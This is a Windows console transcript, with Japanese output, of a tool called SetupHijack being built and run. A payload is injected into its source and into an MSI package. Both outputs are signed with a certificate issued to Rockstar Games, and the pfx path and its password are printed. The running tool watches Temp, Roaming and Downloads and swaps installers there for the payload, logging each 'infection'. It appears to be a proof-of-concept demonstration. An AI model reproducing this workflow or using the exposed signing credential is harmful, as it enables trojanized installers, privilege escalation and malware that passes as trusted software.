C:\Users\Fantastic\Desktop\Sayuri\InfectElevatedSetups>nmake PAYLOAD=“C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe”
Microsoft(R)プログラム メンテナンス ユーティリティ バージョン14.29.30159.0
Copyright(C)Microsoft Corporation. All rights reserved.
powershell–Command“(Get-Content SetupHijack.cpp) -replace ‘#define PAYLOAD_PATH L\”.*\”‘, ‘#define PAYLOAD_PATH L\”%ESCAPED_PAYLOAD%\”‘ | Set-Content SetupHijack.cpp”
cl/nologo/W4/EHsc/DUNICODE/D_UNICODE/MT/O2/cSetupHijack.cpp
SetupHijack.cpp
SetupHijack.cpp(318):警告 C4189:‘hr2’:ローカル変数 は初期化されていますが参照されていません
taskkill/f/im SetupHijack.exe2>nul
powershell–Command“Start-Sleep -Milliseconds 500”
link/nologo/SUBSYSTEM:CONSOLE/ENTRY:wmainCRTStartup/NODEFAULTLIB:MSVCRT/NODEFAULTLIB:MSVCPRT/OUT:SetupHijack.exe SetupHijack.obj kernel32.lib user32.lib shlwapi.lib Shell32.lib/MANIFEST/MANIFESTFILE:SetupHijack.exe.manifest
copy/yinstall.wxs.template install.wxs
1個のファイルをコピーしました.
powershell–Command“(Get-Content install.wxs) -replace ‘Source=\”PAYLOAD_PLACEHOLDER\”‘, ‘Source=\”%ESCAPED_PAYLOAD%\”‘ | Set-Content install.wxs”
wix build install.wxs–oinstall.msi
ペイロードC:\USers\Fantastic\Desktop\DEMO\Renge_x64.exeで install.bat を生成中
ペイロードC:\USers\Fantastic\Desktop\DEMO\Renge_x64.exeで launch_payload.bat を生成中
powershell–Command“(Get-Content install.wxs) -replace ‘(<File Id=\”RengeExeFile\” Source=\”).*?(\” KeyPath=\”yes\”/>)’, ‘`%ESCAPED_PAYLOAD%`’ | Set-Content install.wxs”
call sign_random.bat
使用中の CERT:[certs\rockstar1.pfx]
使用中の PASS:[C!EZxYUxVGPzQDj3]
次の証明書が選択されました:
発行先:Rockstar Games,Inc.
発行者:Entrust Code Signing CA–OVCS1
有効期限: 木 3月2017:16:133000年
SHA1 ハッシュ:C9793F4A2E629D88F2213622D7A0C170D9C7CBC6
追加ストアへの追加が完了しました
正常に署名されました:SetupHijack.exe
正常に署名されたファイル数:1
警告の数:0
エラーの数:0
次の証明書が選択されました:
発行先:Rockstar Games,Inc.
発行者:Entrust Code Signing CA–OVCS1
有効期限: 木 3月2017:16:133000年
SHA1 ハッシュ:C9793F4A2E629D88F2213622D7A0C170D9C7CBC6
追加ストアへの追加が完了しました
正常に署名されました:install.msi
正常に署名されたファイル数:1
警告の数:0
エラーの数:0
C:\Users\Fantastic\Desktop\Sayuri\InfectElevatedSetups>SetupHijack.exe
[2025-09-24 15:20:46] [SetupHijack] 使用するペイロード: C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 15:20:46] [SetupHijack] .msiを感染させる場合、使用するファイル: install.msi
[2025-09-24 15:20:46] [SetupHijack] 有効な場所を再帰的にポーリングして .exe, .msi, .bat を探索中:
[2025-09-24 15:20:46] – C:\Users\FANTAS~1\AppData\Local\Temp
[2025-09-24 15:20:46] – C:\Users\Fantastic\AppData\Roaming
[2025-09-24 15:20:46] – C:\Users\Fantastic\Downloads
[2025-09-24 15:20:46] [SetupHijack] 感染ループに入ります。
[2025-09-24 15:20:59] [SetupHijack] このセッションでの感染数: 0
[2025-09-24 15:21:13] [SetupHijack] C:\Users\FANTAS~1\AppData\Local\Temp\installcmd.bat をペイロード install.bat で置換、バックアップ: C:\Users\FANTAS~1\AppData\Local\Temp\installcmd.bat.bak
[2025-09-24 15:21:13] [SetupHijack] 今回の新規感染数: 1
[2025-09-24 15:21:22] [SetupHijack] C:\Users\Fantastic\Downloads\installcmd.msi をペイロード install.msi で置換、バックアップ: C:\Users\Fantastic\Downloads\installcmd.msi.bak
[2025-09-24 15:21:26] [SetupHijack] 今回の新規感染数: 1
[2025-09-24 15:21:26] [SetupHijack] このセッションでの感染数: 2
[2025-09-24 15:21:41] [SetupHijack] C:\Users\Fantastic\AppData\Roaming\InsecureApp\setup.exe をペイロード C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe で置換、バックアップ: C:\Users\Fantastic\AppData\Roaming\InsecureApp\setup.exe.bak
[2025-09-24 15:21:41] [SetupHijack] 今回の新規感染数: 1
[2025-09-24 15:21:53] [SetupHijack] このセッションでの感染数: 3
